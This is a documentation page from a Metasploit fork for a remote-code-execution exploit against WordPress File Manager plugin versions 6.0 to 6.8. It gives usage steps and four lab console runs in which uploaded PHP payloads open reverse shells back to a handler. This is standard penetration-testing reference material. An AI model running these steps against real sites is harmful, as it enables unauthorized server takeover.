adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
03bb062c2e0ff3cb33dbd52dcd80dda965943239
metasploit-gs/documentation/modules/exploit/multi/http/wp_file_manager_rce.md
T

5.5 KiB
Raw Blame History

Vulnerable Application

Get a copy of version 6.0 plugin from https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip.

Vulnerable versions are 6.0-6.8. Versions below 6.0 are not vulnerable and version 6.9 has been patched.

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/multi/http/wp_file_manager_rce
  3. Do: set TARGETURI <target_uri>
  4. Do: set RHOSTS <target_ip>
  5. Optional: Do: set RPORT <target_port>
  6. Optional: Do: set PAYLOAD <payload> to switch payloads
  7. Optional: Do: set COMMAND <command> to switch elFinder commands used to exploit vulnerability
  8. Do: check to confirm existence of vulnerability or exploit to let the shells rain

Options

COMMAND

This vulnerability can be exploited in 2 ways:

  1. upload to directly upload a payload
  2. mkfile to create a file, then put to write arbitrary code to the newly created file

This option has 2 valid values:

  1. upload: exploit using the upload technique (default)
  2. mkfile+put: exploit using mkfile and put

Scenarios

Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using upload

msf6 > use exploit/multi/http/wp_file_manager_rce 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/aEiptb.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 172.17.0.3:35578) at 2020-10-12 20:19:16 +0800

meterpreter > sysinfo
Computer    : 6fc94cd81e93
OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter >

Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, php/reverse_php payload, using upload

msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/XFVi0d.php
[*] Command shell session 2 opened (192.168.137.128:4444 -> 172.17.0.3:35598) at 2020-10-12 20:20:04 +0800

uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data

Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using mkfile+put

msf6 > use multi/http/wp_file_manager_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put 
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/unl8LJ.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 5 opened (192.168.137.128:4444 -> 172.17.0.3:38076) at 2020-10-15 17:42:00 +0800

meterpreter > sysinfo
Computer    : 6fc94cd81e93
OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter >

Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, php/reverse_php payload, using mkfile+put

msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put 
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/DmFEWt.php
[*] Command shell session 6 opened (192.168.137.128:4444 -> 172.17.0.3:38096) at 2020-10-15 17:43:27 +0800

uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data
Reference in New Issue View Git Blame Copy Permalink